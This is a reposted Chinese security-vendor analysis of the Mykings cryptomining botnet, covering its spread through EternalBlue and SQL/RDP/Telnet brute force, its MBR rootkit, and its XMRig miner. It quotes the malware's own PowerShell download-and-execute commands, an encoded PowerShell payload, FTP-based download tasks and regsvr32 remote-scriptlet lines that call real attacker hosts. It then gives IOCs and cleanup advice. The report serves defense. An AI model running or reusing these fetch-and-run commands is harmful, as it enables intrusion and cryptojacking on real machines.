您的位置:首頁 > 區(qū)塊鏈 >

Mykings挖礦錢包收益已超60萬元 創(chuàng)建WMI過濾器添加后門

2019-07-29 09:47:23 來源: 巴比特

背景騰訊安全御見威脅情報(bào)中心近期檢測(cè)到Mykings挖礦僵尸網(wǎng)絡(luò)更新基礎(chǔ)設(shè)施,病毒啟用了新的域名,挖礦使用新的錢包收益已超過60萬人民幣,

背景

騰訊安全御見威脅情報(bào)中心近期檢測(cè)到Mykings挖礦僵尸網(wǎng)絡(luò)更新基礎(chǔ)設(shè)施,病毒啟用了新的域名,挖礦使用新的錢包收益已超過60萬人民幣,并且仍每天以約10個(gè)XMR的速度挖掘。

Mykings通過1433端口爆破、永恒之藍(lán)漏洞攻擊等方法進(jìn)入系統(tǒng),然后植入RAT、Miner等木馬,組成龐大的僵尸網(wǎng)絡(luò)。

Mykings挖礦僵尸網(wǎng)絡(luò)更新版本具有以下特點(diǎn):

1. 利用永恒之藍(lán)漏洞、1433端口爆破等方法進(jìn)行攻擊,并包含Mirai僵尸網(wǎng)絡(luò)的感染代碼。

2. 感染MBR(感染流程與暗云病毒一致),通過Rookit對(duì)抗殺軟以及下載Payload。

3. 清除競(jìng)品挖礦木馬,關(guān)閉端口封堵其他病毒的入侵渠道。

4. 通過安裝多個(gè)計(jì)劃任務(wù)后門、WMI后門進(jìn)行持久化。

Mykings挖礦僵尸網(wǎng)絡(luò)

詳細(xì)分析

被感染設(shè)備通過WMI后門執(zhí)行Powershell命令

$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http://74.222.14.94/blue.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;

然后從blue.txt中獲取3個(gè)木馬的下載地址,依次下載和執(zhí)行:

上述三個(gè)木馬分析如下:

ok.exe

ok.exe功能為感染MBR。從而實(shí)現(xiàn)自保護(hù),殺軟對(duì)抗,以及聯(lián)網(wǎng)下載payload的功能。

感染流程與騰訊御見威脅情報(bào)中心發(fā)現(xiàn)的暗云系列病毒(參考https://s.tencent.com/research/report/622.html)類似。MBR木馬在最后一個(gè)階段對(duì)ZwCreateSection進(jìn)行HOOK, 在獲得執(zhí)行機(jī)會(huì)后將rootkit映射到內(nèi)核空間并執(zhí)行,最后跳轉(zhuǎn)到ZwCreateSection繼續(xù)執(zhí)行。

Rootkit主要功能為自保護(hù), 結(jié)束殺軟進(jìn)程,及注入系統(tǒng)進(jìn)程winlogon.exe聯(lián)網(wǎng)下載payload執(zhí)行下一階段的惡意行為。

Rootkit獲取用于更新木馬的IP地址http[:]//www.upme0611.info/address.txt

獲取下一階段Payload代碼配置文件http[:]//mbr.kill0604.ru/cloud.txt,從該配置文件中得到挖礦模塊upsupx.exe的下載地址,隨后下載執(zhí)行該文件。

upsupx.exe

upsupx.exe被下載保存至C:\Windows\Temp\conhost.exe執(zhí)行。下載解密挖礦相關(guān)配置文件到C:\Program Files\Common Files\xpdown.dat,配置文件內(nèi)容如下:

45.58.135.106

74.222.14.61

139.5.177.10

ok.xmr6b.ru

獲取要清除的競(jìng)爭(zhēng)對(duì)手或者老版本的挖礦木馬,包括文件名、路徑、是否清除。

然后通過讀注冊(cè)表位置(HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0)

檢測(cè)CPU類型及頻率,根據(jù)CPU的類型和頻率確定使用哪種類型的挖礦程序。

下載開源挖礦程序XMRig,地址為http[:]//198.148.90.34/64work.rar,程序版本2.14.1,挖礦程序啟動(dòng)路徑為C:\Windows\inf\lsmm.exe

啟動(dòng)后從資源文件中獲取挖礦配置文件,得到礦池地址:pool.minexmr.com:5555

錢包455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

根據(jù)錢包查詢收益:已挖礦獲得1077個(gè)XMR

當(dāng)前市場(chǎng)價(jià)格折合人民幣60萬元

u.exe

u.exe利用攻擊模塊C:\Windows\system\msinfo.exe對(duì)內(nèi)網(wǎng)以及外網(wǎng)機(jī)器IP段進(jìn)行掃描攻擊,方法包括利用永恒之藍(lán)漏洞、SQL爆破、Telnet爆破、RDP爆破等,部分攻擊payload還包含感染mirai僵尸網(wǎng)絡(luò)的相關(guān)代碼。

掃描445/1433等端口

永恒之藍(lán)漏洞攻擊

SQL爆破攻擊

爆破登錄后執(zhí)行Shellcode

Telnet爆破攻擊

RDP爆破攻擊

持久化

Myings挖礦僵尸網(wǎng)絡(luò)會(huì)使用以下手法進(jìn)行持久化:

1. 刪除其他病毒設(shè)置的登錄賬戶

通過net user刪除賬戶mm123$、admin、sysadm05;attrib命令設(shè)置Temp目錄下文件為隱藏屬性;taskkill殺死其他挖礦進(jìn)程,刪除其他挖礦進(jìn)程文件、遠(yuǎn)程桌面程序文件;cacls設(shè)置部分目錄及文件的可見性。

通過wmic命令刪除偽裝成系統(tǒng)進(jìn)程的挖礦程序,判斷依據(jù)為文件為系統(tǒng)進(jìn)程名,但是卻不在系統(tǒng)目錄下。

2.設(shè)置相關(guān)文件、路徑的屬性為隱藏

3.關(guān)閉系統(tǒng)自更新

刪除以下計(jì)劃任務(wù),關(guān)閉系統(tǒng)自更新:

SCHTASKS/Delete/TN"WindowsUpdate1"/F&SCHTASKS/Delete/TN"WindowsUpdate3"/F&SCHTASKS/Delete/TN"Windows_Update"/F&SCHTASKS/Delete/TN"Update"/F&SCHTASKS/Delete/TN"Update2"/F&SCHTASKS/Delete/TN"Update4"/F&SCHTASKS/Delete/TN"Update3"/F&SCHTASKS/Delete/TN"windowsinit"/F&SCHTASKS/Delete/TN"SystemSecurityCheck"/F&SCHTASKS/Delete/TN"AdobeFlashPlayer"/F&SCHTASKS/Delete/TN"updat_windows"/F&SCHTASKS/Delete/TN"at1"/F&SCHTASKS/Delete/TN"at2"/F&SCHTASKS/Delete/TN"MicrosoftLocalManager[WindowsServer2008R2Enterprise]"/F&SCHTASKS/DELETE/TN"\Microsoft\Windows\UPnP\Services"/f&SCHTASKS/Delete/TN"MicrosoftLocalManager[WindowsServer2008R2Standard]"/F

4.阻止139/445等端口的連接

網(wǎng)絡(luò)防火墻設(shè)置,設(shè)置65536端口的連接請(qǐng)求為允許,設(shè)置135/137/138/139/445端口的連接為拒絕。

5.添加注冊(cè)表啟動(dòng)項(xiàng)

添加注冊(cè)表Run啟動(dòng)項(xiàng):

6.添加大量計(jì)劃任務(wù)后門

添加5個(gè)計(jì)劃任務(wù):

任務(wù)1:Mysa

執(zhí)行:cmd /c echo openftp.0603bye.info>s&echo test>>s&echo 1433>>s&echobinary>>s&echo get a.exe c:\windows\update.exe>>s&echobye>>s&ftp -s:s&c:\windows\update.exe

任務(wù)2:Mysa1

執(zhí)行:rundll32.exe C:\windows\debug\item.dat,ServiceMain aaaa

任務(wù)3:Mysa2

執(zhí)行:cmd /c echo open ftp.0603bye.info>p&echotest>>p&echo 1433>>p&echo get s.datc:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

任務(wù)4:Mysa3

執(zhí)行:/c echo openftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echoget s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp-s:ps&c:\windows\help\lsmosee.exe

任務(wù)5:ok

執(zhí)行:cmd c:\windows\debug\ok.dat,ServiceMainaaaa

各計(jì)劃任務(wù)后門功能整理如下:

7.添加執(zhí)行大量命令的WMI后門

通過創(chuàng)建WMI事件過濾器和消費(fèi)者來添加后門。

刪除舊的事件過濾器和消費(fèi)者:

fuckyoumm2_filterfuckyoumm2_consumerWindowsEventsFilterWindowsEventsConsumer4WindowsEventsConsumerfuckayoumm3fuckayoumm4

創(chuàng)建新的事件過濾器和消費(fèi)者:

fuckyoumm3

fuckyoumm4

WMI后門執(zhí)行的代碼為:

(1)powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="

(解碼后:

$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http[:]//wmi.1217bye.host/2.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;})

(2)powershell.exe IEX

(New-Object system.Net.WebClient).DownloadString('http[:]//wmi.1217bye.host/S.ps1')

(3)powershell.exe IEX

(New-Object system.Net.WebClient).DownloadString('http[:]//173.208.139.170/s.txt')

(4)powershell.exe IEX

(New-Objectsystem.Net.WebClient).DownloadString('http[:]//139.5.177.19/s.jpg')||regsvr32/u /s /i:http[:]//wmi.1217bye.host/1.txt scrobj.dll

(5)regsvr32 /u /s/i:http[:]//173.208.139.170/2.txt scrobj.dll

(6)regsvr32 /u /s/i:http[:]//139.5.177.19/3.txt scrobj.dll

WMI后門執(zhí)行的命令功能整理如下:

安全建議

1、MS010-17 “永恒之藍(lán)”漏洞

服務(wù)器暫時(shí)關(guān)閉不必要的端口(如135、139、445),方法可參考:https://guanjia.qq.com/web_clinic/s8/585.html

下載并更新Windows系統(tǒng)補(bǔ)丁,及時(shí)修復(fù)永恒之藍(lán)系列漏洞

XP、WindowsServer2003、win8等系統(tǒng)訪問:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Win7、win8.1、WindowsServer 2008、Windows10,WindowsServer2016等系統(tǒng)訪問:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

2、服務(wù)器使用高強(qiáng)度密碼,切勿使用弱口令,防止黑客暴力破解;

3、使用殺毒軟件攔截可能的病毒攻擊;

4、感染Mykings病毒的用戶除了使用騰訊御點(diǎn)進(jìn)行查殺外,還可通過以下步驟進(jìn)行手動(dòng)清理:

1)刪除文件

C:\Windows\System32\ok.exe

C:\WINDOWS\system32\max.exe

C:\Windows\SysWOW64\drivers\64.exe

C:\WINDOWS\system\downs.exe

C:\WINDOWS\Temp\conhost.exe

C:\windows\system32\upsupx.exe

C:\Windows\inf\lsmm.exe

C:\WINDOWS\inf\msief.exe

C:\windows\system32\s.exe

C:\WINDOWS\system\msinfo.exe

C:\Windows\Help\lsmosee.exe

C:\windows\debug\lsmosee.exe

C:\windows\debug\item.dat

2)刪除注冊(cè)表

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\start

HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run\start

3)刪除計(jì)劃任務(wù)

Mysa

Mysa1

Mysa2

Mysa3

ok

4)刪除WMI事件過濾器及消費(fèi)者

fuckyoumm2_filter fuckyoumm2_consumer WindowsEventsFilter WindowsEventsConsumer4 WindowsEventsConsumer fuckayoumm3 fuckayoumm4

fuckyoumm3

fuckyoumm4

IOCs

MD5

9F86AFAE88B2D807A71F442891DFE3D4

147BA798E448EB3CAA7E477E7FB3A959

B89B37A90D0A080C34BBBA0D53BD66DF

1A5EC4861CC11742D308145C32A3842A

5835094B232F999C20FE2B76E9673455

49CC3130496079EBFEA58A069AA4B97A

E5F19CBFBBABA501D4D9A90856FF17D3

A1B9F55BF93E82550B4C21CD3230C3C3

1F0EC5A4B101837EA7CD08FCB3247B2B

FA066F84F3D657DFB9ADF8E0F92F03E7

A1B9F55BF93E82550B4C21CD3230C3C3

IP

139.5.177.10

74.222.14.94

208.110.71.194

80.85.152.247

66.117.2.182

70.39.124.70

150.107.76.227

103.213.246.23

45.58.135.106

103.95.28.54

74.222.14.61

198.148.90.34

185.22.172.13

223.25.247.240

192.187.111.66

66.117.6.174

173.208.139.170

139.5.177.19

173.247.239.186

79.124.78.127

78.142.29.152

74.222.14.61

54.255.141.50

 

Domain

www.upme0611.info

mbr.kill0604.ru

ok.xmr6b.ru

js.0603bye.info

pc.pc0416.xyz

down2.b5w91.com

wmi.1217bye.host

down.mys2018.xyz

URL

http[:]//74.222.14.94/blue.txt

http[:]//js.0603bye.info:280/v.sct

http[:]//173.247.239.186/ok.exe http[:]//139.5.177.10/upsupx.exe http[:]//139.5.177.10/u.exe

http[:]//185.22.172.13/upsupx.exe

http[:]//www.upme0611.info/address.txt

http[:]//103.213.246.23/address.txt

http[:]//208.110.71.194/cloud.txt

http[:]//mbr.kill0604.ru/cloud.txt

http[:]//mbr.kill0604.ru/TestMsg64.tmp

http[:]//mbr.kill0604.ru/TestMsg.tmp

http[:]//45.58.135.106/kill.txt

http[:]//45.58.135.106/md5.txt

http[:]//45.58.135.106/xpxmr.dat

http[:]//198.148.90.34/64.rar

http[:]//45.58.135.106/vers1.txt

http[:]//208.110.71.194/cloud.txt

http[:]//185.22.172.13/upsupx.exe

http[:]//ok.xmr6b.ru/xpdown.dat

http[:]//ok.xmr6b.ru/ok/vers.html

http[:]//ok.xmr6b.ru/ok/down.html

http[:]//198.148.90.34/64work.rar

http[:]//198.148.90.34/upsupx.exe

http[:]//198.148.90.34/b.exe

http[:]//198.148.90.34/b2.exe

http[:]//198.148.90.34:808/b2.exe

http[:]//198.148.90.34/cudart32_65.dll

http[:]//198.148.90.34/0228.rar

http[:]//223.25.247.240/ok/ups.html

http[:]//173.208.139.170/up.txt

https[:]//173.208.139.170/s.txt

http[:]//173.208.139.170/2.txt

http[:]//wmi.1217bye.host/2.txt

http[:]//wmi.1217bye.host/S.ps1

http[:]//173.208.139.170/s.txt

http[:]//139.5.177.19/s.jpg

http[:]//wmi.1217bye.host/1.txt

http[:]//173.208.139.170/2.txt

http[:]//139.5.177.19/3.txt

http[:]//173.247.239.186/max.exe

http[:]//173.247.239.186/ups.exe

http[:]//173.247.239.186/upsupx.exe

http[:]//139.5.177.19/l.txt

http[:]//79.124.78.127/up.txt

錢包:455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

參考鏈接

https://www.freebuf.com/articles/web/146393.html

https://s.tencent.com/research/report/622.html

https://www.freebuf.com/column/187489.html

來源:騰訊御見威脅情報(bào)中心

關(guān)鍵詞: Mykings 挖礦錢包 收益

精選 導(dǎo)讀

募資55億港元萬物云啟動(dòng)招股 預(yù)計(jì)9月29日登陸港交所主板

萬科9月19日早間公告,萬物云當(dāng)日啟動(dòng)招股,預(yù)計(jì)發(fā)行價(jià)介乎每股47 1港元至52 7港元,預(yù)計(jì)9月29日登陸港交所主板。按發(fā)行1 167億股計(jì)算,萬

發(fā)布時(shí)間: 2022-09-20 10:39
管理   2022-09-20

公募基金二季度持股情況曝光 隱形重倉股多為高端制造業(yè)

隨著半年報(bào)披露收官,公募基金二季度持股情況曝光。截至今年二季度末,公募基金全市場(chǎng)基金總數(shù)為9794只,資產(chǎn)凈值為269454 75億元,同比上

發(fā)布時(shí)間: 2022-09-02 10:45
資訊   2022-09-02

又有上市公司宣布變賣房產(chǎn) 上市公司粉飾財(cái)報(bào)動(dòng)作不斷

再有上市公司宣布變賣房產(chǎn)。四川長虹25日稱,擬以1 66億元的轉(zhuǎn)讓底價(jià)掛牌出售31套房產(chǎn)。今年以來,A股公司出售房產(chǎn)不斷。根據(jù)記者不完全統(tǒng)

發(fā)布時(shí)間: 2022-08-26 09:44
資訊   2022-08-26

16天12連板大港股份回復(fù)深交所關(guān)注函 股份繼續(xù)沖高

回復(fù)交易所關(guān)注函后,大港股份繼續(xù)沖高。8月11日大港股份高開,隨后震蕩走高,接近收盤時(shí)觸及漲停,報(bào)20 2元 股。值得一提的是,在7月21日

發(fā)布時(shí)間: 2022-08-12 09:56
資訊   2022-08-12

萬家基金再添第二大股東 中泰證券擬受讓11%基金股權(quán)

7月13日,中泰證券發(fā)布公告,擬受讓齊河眾鑫投資有限公司(以下簡(jiǎn)稱齊河眾鑫)所持有的萬家基金11%的股權(quán),交易雙方共同確定本次交易的標(biāo)的資

發(fā)布時(shí)間: 2022-07-14 09:39
管理   2022-07-14

央行連續(xù)7日每天30億元逆回購 對(duì)債市影響如何?

央行12日再次開展了30億元逆回購操作,中標(biāo)利率2 10%。這已是央行連續(xù)7日每天僅進(jìn)行30億元的逆回購縮量投放,創(chuàng)下去年1月以來的最低操作規(guī)

發(fā)布時(shí)間: 2022-07-13 09:38
資訊   2022-07-13

美元指數(shù)創(chuàng)近20年新高 黃金期貨創(chuàng)出逾9個(gè)月新低

由于對(duì)美聯(lián)儲(chǔ)激進(jìn)加息的擔(dān)憂,美元指數(shù)11日大漲近1%創(chuàng)出近20年新高。受此影響,歐美股市、大宗商品均走弱,而黃金期貨創(chuàng)出逾9個(gè)月新低。美

發(fā)布時(shí)間: 2022-07-13 09:36
資訊   2022-07-13

美股三大股指全線下跌 納斯達(dá)克跌幅創(chuàng)下記錄以來最大跌幅

今年上半年,美股持續(xù)回落。數(shù)據(jù)顯示,道瓊斯指數(shù)上半年下跌15 3%,納斯達(dá)克綜合指數(shù)下跌29 5%,標(biāo)普500指數(shù)下跌20 6%。其中,納斯達(dá)克連續(xù)

發(fā)布時(shí)間: 2022-07-04 09:51
推薦   2022-07-04

融資客熱情回升 兩市融資余額月內(nèi)增加超344億元

近期A股走強(qiáng),滬指6月以來上漲4%,融資客熱情明顯回升。數(shù)據(jù)顯示,截至6月16日,兩市融資余額1 479萬億元,月內(nèi)增加344 67億元,最近一個(gè)半

發(fā)布時(shí)間: 2022-06-20 09:41
資訊   2022-06-20

4個(gè)交易日凈買入超百億元 北向資金持續(xù)流入A股市場(chǎng)

北向資金凈流入態(tài)勢(shì)延續(xù)。繼6月15日凈買入133 59億元后,北向資金6月16日凈買入44 52億元。自5月27日至今,除6月13日以外,北向資金累計(jì)凈

發(fā)布時(shí)間: 2022-06-17 09:37
推薦   2022-06-17

熱門TAG

more
美聯(lián)儲(chǔ)今年已將基準(zhǔn)利率從接近零大幅上調(diào)至略高于3% EIA報(bào)告:美國原油庫存及戰(zhàn)略儲(chǔ)備減少,汽油及精煉油庫存輕微波動(dòng) 美國政府更廣泛推動(dòng)從汽油動(dòng)力汽車轉(zhuǎn)向電動(dòng)汽車的一部分 數(shù)據(jù)顯示:今年9月日本船企接單量延續(xù)8月下跌下跌趨勢(shì) 公告顯示:2022年前三季度TCL中環(huán)研發(fā)投入為27億元 占比營業(yè)收入5.42% 新的111.75億英鎊注資列在“對(duì)金融機(jī)構(gòu)的援助—支付給英格蘭銀行”標(biāo)題下 本次政府儲(chǔ)備肉投放面向北京18家主要連鎖超市門店及相關(guān)零售終端投放 有交易員預(yù)計(jì):如果LME不采取措施 接下來可能將有數(shù)十萬噸鋁流入LME 據(jù)報(bào)道:繼德國最大釀酒商拉德貝格啤酒公司9月宣布漲價(jià) 據(jù)報(bào)道:澳大利亞礦商Pilbara的鋰礦拍賣價(jià)再創(chuàng)新高 折算后的碳酸鋰成本 中集天達(dá)首次公開發(fā)行A股股票 招股書顯示此次擬公開發(fā)行股數(shù)不超過103, 多家銀行加強(qiáng)綠色金融頂層設(shè)計(jì) 致力于為經(jīng)濟(jì)社會(huì)綠色低碳轉(zhuǎn)型貢獻(xiàn)力量 萊特幣 比特幣 數(shù)字資產(chǎn) 火幣 以太經(jīng)典 比特股 EOS 比特幣現(xiàn)金 量子鏈 Hcash 泰達(dá)幣 瑞波幣 Qcash 比特幣鉆石 超級(jí)比特幣 優(yōu)幣 硬分叉 加密貨幣